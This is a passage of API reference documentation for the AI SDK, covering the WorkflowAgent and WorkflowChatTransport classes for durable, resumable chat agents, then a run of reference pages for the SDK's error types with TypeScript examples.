const uiChunk = toUIMessageChunk(modelCallPart);
Types
InferWorkflowAgentUIMessage
Infers the UI message type for a WorkflowAgent instance. Optionally accepts a second type argument for custom message metadata.
import { WorkflowAgent, InferWorkflowAgentUIMessage } from '@ai-sdk/workflow';
const agent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
tools: { weather: weatherTool },
});
type MyAgentUIMessage = InferWorkflowAgentUIMessage<typeof agent>;
InferWorkflowAgentTools
Infers the tool set type of a WorkflowAgent instance.
import { WorkflowAgent, InferWorkflowAgentTools } from '@ai-sdk/workflow';
type MyTools = InferWorkflowAgentTools<typeof myAgent>;
Examples
Basic Agent with Tools
import { WorkflowAgent } from '@ai-sdk/workflow';
import { tool } from 'ai';
import { z } from 'zod';
const agent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
instructions: 'You are a helpful assistant.',
tools: {
weather: tool({
description: 'Get weather for a location',
inputSchema: z.object({
location: z.string(),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
condition: 'sunny',
}),
}),
},
});
const result = await agent.stream({
messages: [
{ role: 'user', content: [{ type: 'text', text: 'What is the weather in NYC?' }] },
],
});
console.log(result.messages);
console.log(result.steps);
Agent in a Workflow with Durable Tools
import { WorkflowAgent, type ModelCallStreamPart } from '@ai-sdk/workflow';
import { convertToModelMessages, tool, type UIMessage } from 'ai';
import { getWritable } from 'workflow';
import { z } from 'zod';
// Tool execute functions marked with 'use step' become durable workflow steps
// with automatic retries and persistence
async function searchFlightsStep(input: {
origin: string;
destination: string;
}) {
'use step';
const response = await fetch(`https://api.flights.example/search?...`);
return response.json();
}
export async function chat(messages: UIMessage[]) {
'use workflow';
const modelMessages = await convertToModelMessages(messages);
const agent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
instructions: 'You are a flight booking assistant.',
tools: {
searchFlights: tool({
description: 'Search for available flights',
inputSchema: z.object({
origin: z.string(),
destination: z.string(),
}),
execute: searchFlightsStep,
}),
},
});
const result = await agent.stream({
messages: modelMessages,
writable: getWritable<ModelCallStreamPart>(),
});
return { messages: result.messages };
}
import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
import { createUIMessageStreamResponse, type UIMessage } from 'ai';
import { start } from 'workflow/api';
import { chat } from '@/workflow/agent-chat';
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const run = await start(chat, [messages]);
return createUIMessageStreamResponse({
stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
});
}
Agent with Structured Output
import { WorkflowAgent } from '@ai-sdk/workflow';
import { Output } from 'ai';
import { z } from 'zod';
const analysisAgent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
});
const result = await analysisAgent.stream({
messages: [
{ role: 'user', content: [{ type: 'text', text: 'Analyze: "The product exceeded my expectations!"' }] },
],
output: Output.object({
schema: z.object({
sentiment: z.enum(['positive', 'negative', 'neutral']),
score: z.number(),
summary: z.string(),
}),
}),
});
console.log(result.output);
// { sentiment: 'positive', score: 9, summary: '...' }
Agent with Tool Approval
import { WorkflowAgent } from '@ai-sdk/workflow';
import { tool } from 'ai';
import { z } from 'zod';
const agent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
tools: {
bookFlight: tool({
description: 'Book a flight',
inputSchema: z.object({
flightId: z.string(),
passengerName: z.string(),
}),
needsApproval: true, // Pauses the agent until user approves
execute: bookFlightStep,
}),
},
});
Agent with Lifecycle Callbacks
import { WorkflowAgent } from '@ai-sdk/workflow';
const agent = new WorkflowAgent({
model: 'anthropic/claude-sonnet-4-6',
tools: { weather: weatherTool },
// Agent-wide callbacks
onStepFinish({ usage }) {
console.log('Tokens used:', usage.totalTokens);
},
});
const result = await agent.stream({
messages,
// Per-call callbacks (both fire)
async onStepFinish({ usage }) {
await trackUsage(usage);
},
onFinish({ steps, totalUsage }) {
console.log(`Done in ${steps.length} steps, ${totalUsage.totalTokens} tokens`);
},
});
title: WorkflowChatTransport description: API Reference for the WorkflowChatTransport class.
WorkflowChatTransport
A ChatTransport implementation for useChat that enables automatic stream reconnection for workflow-based chat apps. It posts messages to a chat endpoint, extracts the x-workflow-run-id response header, and reconnects to a /{runId}/stream endpoint on interruption (network failures, page refreshes, function timeouts).
Unlike DefaultChatTransport which assumes the full response arrives in a single HTTP request, WorkflowChatTransport is designed for Vercel Workflows where the initial response stream may be interrupted by function timeouts. The transport automatically detects missing finish events and reconnects to resume from where the stream left off.
'use client';
import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
export default function Chat() {
const { messages, sendMessage } = useChat({
transport: new WorkflowChatTransport({
api: '/api/chat',
maxConsecutiveErrors: 5,
initialStartIndex: -50,
}),
});
// ... render chat UI
}
Import
<Snippet text={`import { WorkflowChatTransport } from "@ai-sdk/workflow"`} prompt={false} />
Constructor
Parameters
<PropertiesTable
content={[
{
name: 'api',
type: 'string',
isOptional: true,
description:
"API endpoint for chat requests. The reconnection endpoint is derived from this as {api}/{runId}/stream. Default: '/api/chat'.",
},
{
name: 'fetch',
type: 'typeof fetch',
isOptional: true,
description:
'Custom fetch implementation to use for HTTP requests. Default: global fetch.',
},
{
name: 'maxConsecutiveErrors',
type: 'number',
isOptional: true,
description:
'Maximum number of consecutive errors allowed during reconnection attempts before giving up. Default: 3.',
},
{
name: 'initialStartIndex',
type: 'number',
isOptional: true,
description:
'Default chunk index to start from when reconnecting. Negative values read from the end of the stream (e.g., -50 fetches the last 50 chunks), useful for resuming after a page refresh without replaying the full conversation. Can be overridden per-call via reconnectToStream options. Default: 0.',
},
{
name: 'onChatSendMessage',
type: '(response: Response, options: SendMessagesOptions) => void | Promise',
isOptional: true,
description:
'Callback invoked after the initial POST request succeeds. Useful for inspecting response headers (e.g., extracting workflow run ID) or tracking chat history on the client side.',
},
{
name: 'onChatEnd',
type: '({ chatId, chunkIndex }) => void | Promise',
isOptional: true,
description:
'Callback invoked when the stream ends (receives a finish chunk). Receives the chat ID and total chunk count. Useful for cleanup or state updates.',
},
{
name: 'prepareSendMessagesRequest',
type: 'PrepareSendMessagesRequest',
isOptional: true,
description:
'Function to customize the POST request before sending. Can override the API endpoint, headers, credentials, and body.',
},
{
name: 'prepareReconnectToStreamRequest',
type: 'PrepareReconnectToStreamRequest',
isOptional: true,
description:
'Function to customize the reconnection GET request. Can override the API endpoint, headers, and credentials.',
},
]}
/>
Methods
sendMessages()
Sends messages to the chat endpoint via POST and returns a streaming response. If the stream is interrupted (no finish event received), the transport automatically reconnects via GET to {api}/{runId}/stream?startIndex={chunkIndex} to resume from where it left off.
The POST request includes the messages as JSON and expects the response to include an x-workflow-run-id header identifying the workflow run.
const stream = await transport.sendMessages({
chatId: 'chat-123',
trigger: 'submit-message',
messages: [...],
abortSignal: controller.signal,
});
<PropertiesTable content={[ { name: 'chatId', type: 'string', description: 'Unique identifier for the chat session.', }, { name: 'trigger', type: "'submit-message' | 'regenerate-message'", description: 'The type of message submission.', }, { name: 'messageId', type: 'string | undefined', description: 'ID of the message to regenerate, or undefined for new messages.', }, { name: 'messages', type: 'UIMessage[]', description: 'Array of UI messages representing the conversation history.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal to abort the request. Propagated to both the initial POST and any reconnection GET requests.', }, ]} />
Returns
Returns a Promise<ReadableStream<UIMessageChunk>> that includes chunks from both the initial POST response and any automatic reconnection.
reconnectToStream()
Reconnects to an existing chat stream that was previously interrupted. Useful for resuming after a page refresh or when the client needs to re-establish a connection.
const stream = await transport.reconnectToStream({
chatId: 'chat-123',
startIndex: -50, // Optional: fetch last 50 chunks
});
<PropertiesTable content={[ { name: 'chatId', type: 'string', description: 'The chat ID to reconnect to. Used to construct the reconnection URL.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal to abort the reconnection request.', }, { name: 'startIndex', type: 'number', isOptional: true, description: "Override the start index for this reconnection. Negative values read from the end of the stream. When omitted, falls back to the constructor's initialStartIndex.", }, ]} />
Returns
Returns a Promise<ReadableStream<UIMessageChunk> | null>.
How Reconnection Works
The transport follows this flow:
- POST to {api} with messages. The response must include an x-workflow-run-id header.
- Stream the SSE response, counting chunks as they arrive.
- Detect interruption: If the stream closes without a finish event (e.g., function timeout, network error), the transport knows the response is incomplete.
- Reconnect via GET to {api}/{runId}/stream?startIndex={chunkIndex} to resume from the last received chunk (illustrated below).
- Retry: If the reconnection stream also interrupts, retry up to maxConsecutiveErrors times.
- Complete: Once a finish event is received, call onChatEnd and close the stream.
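For illustration, here is the shape of the reconnection URL the transport constructs (the values below are hypothetical; runId comes from the x-workflow-run-id response header and chunkIndex counts the chunks received so far):
const api = '/api/chat';
const runId = 'run_123'; // hypothetical run ID
const chunkIndex = 42; // chunks received before the interruption
const reconnectUrl = `${api}/${runId}/stream?startIndex=${chunkIndex}`;
// => '/api/chat/run_123/stream?startIndex=42'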
Negative Start Index
When initialStartIndex is negative (e.g., -50), the transport sends it as-is in the first reconnection request. The server should resolve this to an absolute position and return the x-workflow-stream-tail-index response header so the transport can compute the correct position for subsequent retries.
If the header is missing or invalid, the transport falls back to replaying from the beginning (startIndex=0).
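A minimal sketch of how a server might implement this tail resolution, assuming the total chunk count is available from your stream store (the helper name is hypothetical):
// Resolve a possibly negative startIndex against the stored chunk count
function resolveStartIndex(startIndex: number, totalChunks: number) {
  if (startIndex >= 0) return { resolved: startIndex, tailIndex: undefined };
  // e.g. startIndex = -50 with 200 stored chunks resolves to chunk 150
  const resolved = Math.max(0, totalChunks + startIndex);
  return { resolved, tailIndex: resolved };
}
const { resolved, tailIndex } = resolveStartIndex(-50, 200);
const headers: Record<string, string> = {};
if (tailIndex !== undefined) {
  // Lets the transport compute absolute positions for later retries
  headers['x-workflow-stream-tail-index'] = String(tailIndex);
}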
Server Requirements
For WorkflowChatTransport to work, your server must provide two endpoints:
POST {api} (e.g., /api/chat)
- Accept messages as JSON body
- Return an SSE stream of UIMessageChunk events
- Include an x-workflow-run-id response header
GET {api}/{runId}/stream (e.g., /api/chat/{runId}/stream)
- Accept a startIndex query parameter
- Return the SSE stream starting from the given chunk index
- For negative startIndex, resolve to the tail and include the x-workflow-stream-tail-index response header
See the WorkflowAgent guide for complete endpoint examples.
Examples
Basic Usage with useChat
'use client';
import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
import { useMemo } from 'react';
export default function Chat() {
const transport = useMemo(
() => new WorkflowChatTransport({ api: '/api/chat' }),
[],
);
const { messages, sendMessage, status } = useChat({ transport });
return (
<div>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) =>
part.type === 'text' ? <span key={index}>{part.text}</span> : null,
)}
</div>
))}
<button onClick={() => sendMessage({ text: 'Hello!' })}>Send</button>
</div>
);
}
With Callbacks and Page Refresh Recovery
'use client';
import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
import { useMemo } from 'react';
export default function Chat() {
const transport = useMemo(
() =>
new WorkflowChatTransport({
api: '/api/chat',
maxConsecutiveErrors: 5,
initialStartIndex: -50, // Resume from last 50 chunks on page refresh
onChatSendMessage: (response) => {
const runId = response.headers.get('x-workflow-run-id');
console.log('Workflow run started:', runId);
},
onChatEnd: ({ chatId, chunkIndex }) => {
console.log(`Chat ${chatId} complete, ${chunkIndex} chunks`);
},
}),
[],
);
const { messages, sendMessage } = useChat({ transport });
// ... render chat UI
}
Server-Side Endpoints (Next.js)
import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
import { createUIMessageStreamResponse, type UIMessage } from 'ai';
import { start } from 'workflow/api';
import { chat } from '@/workflow/agent-chat';
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const run = await start(chat, [messages]);
return createUIMessageStreamResponse({
stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
headers: {
'x-workflow-run-id': run.runId,
},
});
}
import { createModelCallToUIChunkTransform } from '@ai-sdk/workflow';
import type { NextRequest } from 'next/server';
import { getRun } from 'workflow/api';
export async function GET(
request: NextRequest,
{ params }: { params: Promise<{ runId: string }> },
) {
const { runId } = await params;
const startIndex = Number(
new URL(request.url).searchParams.get('startIndex') ?? '0',
);
const run = await getRun(runId);
const readable = run
.getReadable({ startIndex })
.pipeThrough(createModelCallToUIChunkTransform());
return new Response(readable, {
headers: {
'Content-Type': 'text/event-stream',
'Cache-Control': 'no-cache',
Connection: 'keep-alive',
'x-workflow-run-id': runId,
},
});
}
title: AI SDK Workflow description: Reference documentation for @ai-sdk/workflow collapsed: true
AI SDK Workflow
@ai-sdk/workflow provides the WorkflowAgent class for building durable, resumable AI agents that run inside Vercel Workflows. It handles tool schema serialization, workflow step boundaries, and built-in tool approval flows.
<IndexCards cards={[ { title: 'WorkflowAgent', description: 'Create durable AI agents with tool calling, streaming, and workflow integration.', href: '/docs/reference/ai-sdk-workflow/workflow-agent', }, { title: 'WorkflowChatTransport', description: 'Chat transport with automatic stream reconnection for workflow-based apps.', href: '/docs/reference/ai-sdk-workflow/workflow-chat-transport', }, ]} />
title: AI_APICallError description: Learn how to fix AI_APICallError
AI_APICallError
This error occurs when an API call fails.
Properties
- url: The URL of the API request that failed
- requestBodyValues: The request body values sent to the API
- statusCode: The HTTP status code returned by the API (optional)
- responseHeaders: The response headers returned by the API (optional)
- responseBody: The response body returned by the API (optional)
- isRetryable: Whether the request can be retried based on the status code
- data: Any additional data associated with the error (optional)
- cause: The underlying error that caused the API call to fail (optional)
Checking for this Error
You can check if an error is an instance of AI_APICallError using:
import { APICallError } from 'ai';
if (APICallError.isInstance(error)) {
// Handle the error
}
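Once the type is narrowed, the documented properties can guide error handling; a minimal sketch (the failing call is elided):
import { APICallError } from 'ai';
try {
  // ... an SDK call that performs an API request
} catch (error) {
  if (APICallError.isInstance(error)) {
    console.log('URL:', error.url);
    console.log('Status:', error.statusCode);
    console.log('Retryable:', error.isRetryable);
  }
}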
title: AI_DownloadError description: Learn how to fix AI_DownloadError
AI_DownloadError
This error occurs when a download fails.
Properties
- url: The URL that failed to download
- statusCode: The HTTP status code returned by the server (optional)
- statusText: The HTTP status text returned by the server (optional)
- cause: The underlying error that caused the download to fail (optional)
- message: The error message containing details about the download failure (optional, auto-generated)
Checking for this Error
You can check if an error is an instance of AI_DownloadError using:
import { DownloadError } from 'ai';
if (DownloadError.isInstance(error)) {
// Handle the error
}
title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError
AI_EmptyResponseBodyError
This error occurs when the server returns an empty response body.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_EmptyResponseBodyError using:
import { EmptyResponseBodyError } from 'ai';
if (EmptyResponseBodyError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError
AI_InvalidArgumentError
This error occurs when an invalid argument was provided.
Properties
- parameter: The name of the parameter that is invalid
- value: The invalid value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidArgumentError using:
import { InvalidArgumentError } from 'ai';
if (InvalidArgumentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError
AI_InvalidDataContentError
This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages.
Properties
- content: The invalid content value
- cause: The underlying error that caused this error (optional)
- message: The error message describing the expected and received content types (optional, auto-generated)
Checking for this Error
You can check if an error is an instance of AI_InvalidDataContentError using:
import { InvalidDataContentError } from 'ai';
if (InvalidDataContentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError
AI_InvalidMessageRoleError
This error occurs when an invalid message role is provided.
Properties
- role: The invalid role value
- message: The error message (optional, auto-generated from role)
Checking for this Error
You can check if an error is an instance of AI_InvalidMessageRoleError using:
import { InvalidMessageRoleError } from 'ai';
if (InvalidMessageRoleError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError
AI_InvalidPromptError
This error occurs when the prompt provided is invalid.
Potential Causes
UI Messages
You are passing a UIMessage[] as messages into e.g. streamText.
You need to first convert them to a ModelMessage[] using convertToModelMessages().
import { type UIMessage, generateText, convertToModelMessages } from 'ai';
const messages: UIMessage[] = [
/* ... */
];
const result = await generateText({
// ...
messages: await convertToModelMessages(messages),
});
Properties
- prompt: The invalid prompt value
- message: The error message (required in constructor)
- cause: The cause of the error (optional)
Checking for this Error
You can check if an error is an instance of AI_InvalidPromptError using:
import { InvalidPromptError } from 'ai';
if (InvalidPromptError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError
AI_InvalidResponseDataError
This error occurs when the server returns a response with invalid data content.
Properties
- data: The invalid response data value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidResponseDataError using:
import { InvalidResponseDataError } from 'ai';
if (InvalidResponseDataError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidToolApprovalError description: Learn how to fix AI_InvalidToolApprovalError
AI_InvalidToolApprovalError
This error occurs when a tool approval response references an unknown approvalId. No matching tool-approval-request was found in the message history.
Properties
approvalId: The approval ID that was not found
Checking for this Error
You can check if an error is an instance of AI_InvalidToolApprovalError using:
import { InvalidToolApprovalError } from 'ai';
if (InvalidToolApprovalError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidToolInputError description: Learn how to fix AI_InvalidToolInputError
AI_InvalidToolInputError
This error occurs when invalid tool input was provided.
Properties
- toolName: The name of the tool with invalid inputs
- toolInput: The invalid tool inputs
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidToolInputError using:
import { InvalidToolInputError } from 'ai';
if (InvalidToolInputError.isInstance(error)) {
// Handle the error
}
title: AI_JSONParseError description: Learn how to fix AI_JSONParseError
AI_JSONParseError
This error occurs when JSON fails to parse.
Properties
- text: The text value that could not be parsed
- cause: The underlying parsing error (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_JSONParseError using:
import { JSONParseError } from 'ai';
if (JSONParseError.isInstance(error)) {
// Handle the error
}
title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError
AI_LoadAPIKeyError
This error occurs when an API key is not loaded successfully.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadAPIKeyError using:
import { LoadAPIKeyError } from 'ai';
if (LoadAPIKeyError.isInstance(error)) {
// Handle the error
}
title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError
AI_LoadSettingError
This error occurs when a setting is not loaded successfully.
Properties
message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadSettingError using:
import { LoadSettingError } from 'ai';
if (LoadSettingError.isInstance(error)) {
// Handle the error
}
title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError
AI_MessageConversionError
This error occurs when message conversion fails.
Properties
- originalMessage: The original message that failed conversion
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_MessageConversionError using:
import { MessageConversionError } from 'ai';
if (MessageConversionError.isInstance(error)) {
// Handle the error
}
title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError
AI_NoContentGeneratedError
This error occurs when the AI provider fails to generate content.
Properties
message: The error message (optional, defaults to 'No content generated.')
Checking for this Error
You can check if an error is an instance of AI_NoContentGeneratedError using:
import { NoContentGeneratedError } from 'ai';
if (NoContentGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError
AI_NoImageGeneratedError
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated an invalid response.
Properties
- message: The error message (optional, defaults to 'No image generated.').
- responses: Metadata about the image model responses, including timestamp, model, and headers (optional).
- cause: The cause of the error. You can use this for more detailed error handling (optional).
Checking for this Error
You can check if an error is an instance of AI_NoImageGeneratedError using:
import { generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError
AI_NoObjectGeneratedError
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
Properties
- message: The error message (optional, defaults to 'No object generated.').
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode (optional).
- response: Metadata about the language model response, including response id, timestamp, and model (required in constructor).
- usage: Request token usage (required in constructor).
- finishReason: Request finish reason, e.g. 'length' if the model generated the maximum number of tokens, which can result in a JSON parsing error (required in constructor).
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling (optional).
Checking for this Error
You can check if an error is an instance of AI_NoObjectGeneratedError using:
import { generateText, NoObjectGeneratedError, Output } from 'ai';
try {
await generateText({ model, output: Output.object({ schema }), prompt });
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
console.log('Finish Reason:', error.finishReason);
}
}
title: AI_NoOutputGeneratedError description: Learn how to fix AI_NoOutputGeneratedError
AI_NoOutputGeneratedError
This error is thrown when no LLM output was generated, e.g. because of errors.
Properties
- message: The error message (optional, defaults to 'No output generated.')
- cause: The underlying error that caused no output to be generated (optional)
Checking for this Error
You can check if an error is an instance of AI_NoOutputGeneratedError using:
import { NoOutputGeneratedError } from 'ai';
if (NoOutputGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSpeechGeneratedError description: Learn how to fix AI_NoSpeechGeneratedError
AI_NoSpeechGeneratedError
This error occurs when no audio could be generated from the input.
Properties
responses: Array of speech model response metadata (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_NoSpeechGeneratedError using:
import { NoSpeechGeneratedError } from 'ai';
if (NoSpeechGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError
AI_NoSuchModelError
This error occurs when a model ID is not found.
Properties
- modelId: The ID of the model that was not found
- modelType: The type of model ('languageModel', 'embeddingModel', 'imageModel', 'transcriptionModel', 'speechModel', or 'rerankingModel')
- message: The error message (optional, auto-generated from modelId and modelType)
Checking for this Error
You can check if an error is an instance of AI_NoSuchModelError using:
import { NoSuchModelError } from 'ai';
if (NoSuchModelError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError
AI_NoSuchProviderError
This error occurs when a provider ID is not found.
Properties
- providerId: The ID of the provider that was not found
- availableProviders: Array of available provider IDs
- modelId: The ID of the model
- modelType: The type of model
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchProviderError using:
import { NoSuchProviderError } from 'ai';
if (NoSuchProviderError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchProviderReferenceError description: Learn how to fix AI_NoSuchProviderReferenceError
AI_NoSuchProviderReferenceError
This error occurs when a provider reference cannot be resolved because the specified provider is not found in the provider reference mapping.
Properties
- provider: The provider that was not found
- reference: The full provider reference mapping that was searched
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchProviderReferenceError using:
import { NoSuchProviderReferenceError } from 'ai';
if (NoSuchProviderReferenceError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError
AI_NoSuchToolError
This error occurs when a model tries to call an unavailable tool.
Properties
- toolName: The name of the tool that was not found
- availableTools: Array of available tool names (optional)
- message: The error message (optional, auto-generated from toolName and availableTools)
Checking for this Error
You can check if an error is an instance of AI_NoSuchToolError using:
import { NoSuchToolError } from 'ai';
if (NoSuchToolError.isInstance(error)) {
// Handle the error
}
title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError
AI_NoTranscriptGeneratedError
This error occurs when no transcript could be generated from the input.
Properties
responses: Array of transcription model response metadata (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_NoTranscriptGeneratedError using:
import { NoTranscriptGeneratedError } from 'ai';
if (NoTranscriptGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoVideoGeneratedError description: Learn how to fix AI_NoVideoGeneratedError
AI_NoVideoGeneratedError
This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated an invalid response.
Properties
- message: The error message (optional, defaults to 'No video generated.').
- responses: Metadata about the video model responses, including timestamp, model, and headers (optional).
- cause: The cause of the error. You can use this for more detailed error handling (optional).
Checking for this Error
You can check if an error is an instance of AI_NoVideoGeneratedError using:
import {
experimental_generateVideo as generateVideo,
NoVideoGeneratedError,
} from 'ai';
try {
await generateVideo({ model, prompt });
} catch (error) {
if (NoVideoGeneratedError.isInstance(error)) {
console.log('NoVideoGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
title: AI_RetryError description: Learn how to fix AI_RetryError
AI_RetryError
This error occurs when a retry operation fails.
Properties
- reason: The reason for the retry failure
- lastError: The most recent error that occurred during retries
- errors: Array of all errors that occurred during retry attempts
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_RetryError using:
import { RetryError } from 'ai';
if (RetryError.isInstance(error)) {
// Handle the error
}
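Since retries wrap multiple attempts, the documented properties let you inspect each failure; a minimal sketch assuming error was caught from a retried call:
import { RetryError } from 'ai';
if (RetryError.isInstance(error)) {
  console.log('Reason:', error.reason);
  console.log('Failed attempts:', error.errors.length);
  console.log('Last error:', error.lastError);
}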
title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError
AI_TooManyEmbeddingValuesForCallError
This error occurs when too many values are provided in a single embedding call.
Properties
- provider: The AI provider name
- modelId: The ID of the embedding model
- maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
- values: The array of values that was provided
Checking for this Error
You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:
import { TooManyEmbeddingValuesForCallError } from 'ai';
if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
// Handle the error
}
title: AI_ToolCallNotFoundForApprovalError description: Learn how to fix AI_ToolCallNotFoundForApprovalError
AI_ToolCallNotFoundForApprovalError
This error occurs when a tool approval request references a tool call that was not found. This can happen when processing provider-emitted approval requests (e.g., MCP flows) where the referenced tool call ID does not exist.
Properties
- toolCallId: The tool call ID that was not found
- approvalId: The approval request ID
Checking for this Error
You can check if an error is an instance of AI_ToolCallNotFoundForApprovalError using:
import { ToolCallNotFoundForApprovalError } from 'ai';
if (ToolCallNotFoundForApprovalError.isInstance(error)) {
// Handle the error
}
title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError
ToolCallRepairError
This error occurs when there is a failure while attempting to repair an invalid tool call.
This typically happens when the AI attempts to fix either
a NoSuchToolError or InvalidToolInputError.
Properties
- originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolInputError)
- message: The error message
- cause: The underlying error that caused the repair to fail
Checking for this Error
You can check if an error is an instance of ToolCallRepairError using:
import { ToolCallRepairError } from 'ai';
if (ToolCallRepairError.isInstance(error)) {
// Handle the error
}
title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError
AI_TypeValidationError
This error occurs when type validation fails.
Properties
- value: The value that failed validation
- cause: The underlying validation error (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_TypeValidationError using:
import { TypeValidationError } from 'ai';
if (TypeValidationError.isInstance(error)) {
// Handle the error
}
title: AI_UIMessageStreamError description: Learn how to fix AI_UIMessageStreamError
AI_UIMessageStreamError
This error occurs when a UI message stream contains invalid or out-of-sequence chunks.
Common causes:
- Receiving a text-delta chunk without a preceding text-start chunk
- Receiving a text-end chunk without a preceding text-start chunk
- Receiving a reasoning-delta chunk without a preceding reasoning-start chunk
- Receiving a reasoning-end chunk without a preceding reasoning-start chunk
- Receiving a tool-input-delta chunk without a preceding tool-input-start chunk
- Attempting to access a tool invocation that doesn't exist
This error often surfaces when an upstream request fails before any tokens are streamed and a custom transport tries to write an inline error message to the UI stream without the proper start chunk.
Properties
- chunkType: The type of chunk that caused the error (e.g., text-delta, reasoning-end, tool-input-delta)
- chunkId: The ID associated with the failing chunk (part ID or toolCallId)
- message: The error message with details about what went wrong
Checking for this Error
You can check if an error is an instance of AI_UIMessageStreamError using:
import { UIMessageStreamError } from 'ai';
if (UIMessageStreamError.isInstance(error)) {
console.log('Chunk type:', error.chunkType);
console.log('Chunk ID:', error.chunkId);
// Handle the error
}
Common Solutions
- Ensure proper chunk ordering: Always send a *-start chunk before any *-delta or *-end chunks for the same ID:
  // Correct order
  writer.write({ type: 'text-start', id: 'my-text' });
  writer.write({ type: 'text-delta', id: 'my-text', delta: 'Hello' });
  writer.write({ type: 'text-end', id: 'my-text' });
- Verify IDs match: Ensure the id used in *-delta and *-end chunks matches the id used in the corresponding *-start chunk.
- Handle error paths correctly: When writing error messages in custom transports, ensure you emit the full start/delta/end sequence:
  // When handling errors in custom transports
  writer.write({ type: 'text-start', id: errorId });
  writer.write({ type: 'text-delta', id: errorId, delta: 'Request failed...' });
  writer.write({ type: 'text-end', id: errorId });
- Check stream producer logic: Review your streaming implementation to ensure chunks are sent in the correct order, especially when dealing with concurrent operations or merged streams.
title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError
AI_UnsupportedFunctionalityError
This error occurs when functionality is not supported.
Properties
- functionality: The name of the unsupported functionality
- message: The error message (optional, auto-generated from functionality)
Checking for this Error
